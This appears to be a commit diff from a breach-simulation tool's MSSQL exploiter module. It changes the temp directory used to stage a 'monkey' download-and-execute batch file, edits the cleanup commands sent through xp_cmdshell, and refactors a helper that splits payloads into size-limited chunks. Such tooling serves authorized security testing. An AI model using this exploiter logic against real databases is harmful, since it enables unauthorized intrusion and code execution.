Changed tmp dir path on mssql exploiter

2019-09-02 08:37:52 +00:00 · 2019-09-02 08:37:52 +00:00 · b733cf3389
parent 8c930fae66
commit b733cf3389
2 changed files with 14 additions and 11 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -11,7 +11,6 @@ from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, get_tar
    build_monkey_commandline, get_monkey_depth
 from infection_monkey.model import DROPPER_ARG
 from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
-import infection_monkey.utils

 LOG = logging.getLogger(__name__)

@ -28,7 +27,7 @@ class MSSQLExploiter(HostExploiter):

    # Temporary file that saves commands for monkey's download and execution.
    TMP_FILE_NAME = 'tmp_monkey.bat'
-    TMP_DIR_PATH = "C:\\windows\\temp\\monkey_dir"
+    TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"

    MAX_XP_CMDSHELL_COMMAND_SIZE = 128

@ -110,11 +109,10 @@ class MSSQLExploiter(HostExploiter):
        self.run_file(tmp_file_path)

        # Remove temporary dir we stored payload at
-        if not infection_monkey.utils.get_monkey_dir_path() == MSSQLExploiter.TMP_DIR_PATH.lower():
-            tmp_file_removal_command = MSSQLLimitedSizePayload(command="del /f %s" % tmp_file_path)
-            self.try_to_run_mssql_command(tmp_file_removal_command)
-            tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir %s" % MSSQLExploiter.TMP_DIR_PATH)
-            self.try_to_run_mssql_command(tmp_dir_removal_command)
+        tmp_file_removal_command = MSSQLLimitedSizePayload(command="del %s" % tmp_file_path)
+        self.try_to_run_mssql_command(tmp_file_removal_command)
+        tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir %s" % MSSQLExploiter.TMP_DIR_PATH)
+        self.try_to_run_mssql_command(tmp_dir_removal_command)

        return True

--- a/monkey/infection_monkey/exploit/tools/payload_parsing.py
+++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py
@ -19,7 +19,12 @@ class Payload(object):
        self.prefix = prefix
        self.suffix = suffix

-    def get_full_payload(self, command=""):
+    def get_payload(self, command=""):
+        """
+        Returns prefixed and suffixed command (full payload)
+        :param command: Command to suffix/prefix. If no command is passed than objects' property is used
+        :return: prefixed and suffixed command (full payload)
+        """
        if not command:
            command = self.command
        return "{}{}{}".format(self.prefix, command, self.suffix)
@ -50,10 +55,10 @@ class LimitedSizePayload(Payload):
            return False
        elif self.command == "":
            return [self.prefix+self.suffix]
-
-        commands = [self.get_full_payload(part)
+        wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length())
+        commands = [self.get_payload(part)
                    for part
-                    in textwrap.wrap(self.command, self.get_max_sub_payload_length())]
+                    in wrapper.wrap(self.command)]
        return commands

    def get_max_sub_payload_length(self):